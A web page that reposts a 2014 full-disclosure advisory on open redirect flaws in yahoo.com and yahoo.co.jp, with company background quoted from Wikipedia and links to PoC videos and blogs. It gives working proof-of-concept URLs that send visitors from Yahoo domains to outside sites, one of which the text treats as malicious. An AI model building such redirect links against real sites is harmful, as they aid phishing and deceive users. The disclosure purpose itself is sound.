<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The below things be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to Open Redirect vulnerabilities and cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1) Yahoo.com Open Redirect</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">yahoo.com</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Yahoo Inc. (styled as Yahoo!) is an American multinational technology company headquartered in Sunnyvale, California. It is globally known for its Web portal, search engine Yahoo Search, and related services, including Yahoo Directory, Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Groups, Yahoo Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo websites every month. Yahoo itself claims it attracts more than half a billion consumers every month in more than 30 languages. Yahoo was founded by Jerry Yang and David Filo in January 1994 and was incorporated on March 1, 1995. Marissa Mayer, a former Google executive, serves as CEO and President of the company." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URLs:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://p2.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://help.yahoo.com/help/<wbr></wbr>us/local/index.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://p3.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://www.google.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://p4.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://www.google.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Poc Video:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=k4eFLsTyZkg">https://www.youtube.com/watch?v=k4eFLsTyZkg</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Another Yahoo Open Rediect Vulnerability Video Published Before:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=GTd1Gkj6OUY" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?<wbr></wbr>v=GTd1Gkj6OUY</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html">http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2) <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">yahoo.co.jp</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Yahoo! JAPAN Corporation (ヤフージャパン株式会社 Yafū Japan Kabushiki-gaisha?) is a Japanese internet company formed as a joint venture between the American internet company Yahoo! and the Japanese internet company SoftBank. It is headquartered at Midtown Tower in the Tokyo Midtown complex in Akasaka, Minato, Tokyo. Yahoo! Japan was listed on JASDAQ in November 1997. In January 2000, it became the first stock in Japanese history to trade for more than ¥100 million per share. The company was listed on the Tokyo Stock Exchange in October 2003 and became part of the Nikkei 225 stock market index in 2005. Yahoo! Japan acquired the naming rights for the Fukuoka Dome in 2005, renaming the dome as the "Fukuoka Yahoo! Japan Dome". The "Yahoo Dome" is the home field for the Fukuoka SoftBank Hawks, a professional baseball team majority owned by SoftBank." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Use one of webpages for the following tests. The webpage address is "<a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a>". Suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp" target="_blank">http://order.store.yahoo.co.<wbr></wbr>jp/cgi-bin/yj-affiliate-entry?<wbr></wbr>ITRACK_INFO=<wbr></wbr>087836355102152107140219030344<wbr></wbr>&COOKIE_PATH=/&COOKIE_DOMAIN=.<wbr></wbr>yahoo.co.jp&VIEW_URL=http%3A%<wbr></wbr>2F%2Fshopping.yahoo.co.jp</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope" target="_blank">http://order.store.yahoo.co.<wbr></wbr>jp/cgi-bin/yj-affiliate-entry?<wbr></wbr>ITRACK_INFO=<wbr></wbr>087836355102152107140219030330<wbr></wbr>&COOKIE_PATH=/&COOKIE_DOMAIN=.<wbr></wbr>yahoo.co.jp&VIEW_URL=http://<wbr></wbr>www.inzeed.com/kaleidoscope</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Poc Video:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be">https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Blog:</b></span></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Articles:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/88">http://seclists.org/fulldisclosure/2014/Dec/88</a></span></div>
<div style="margin: 0px;">
<a href="http://marc.info/?l=full-disclosure&m=141897158416178&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=141897158416178&w=4</span></a></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01467.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01467.html</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://hackertopic.wordpress.com/2015/01/15/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/">https://hackertopic.wordpress.com/2015/01/15/yahoo-yahoo-japan-vulnerable-to-spams/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/110001022997295385049/posts/4GTENtJY9XE">https://plus.google.com/110001022997295385049/posts/4GTENtJY9XE</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/justqdjing/status/546910373169741825">https://twitter.com/justqdjing/status/546910373169741825</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/pcwebsecurities/posts/701648936647693">https://www.facebook.com/pcwebsecurities/posts/701648936647693</a><br /><a href="http://homehut.lofter.com/post/1d226c81_6e6884f">http://homehut.lofter.com/post/1d226c81_6e6884f</a></span></div>
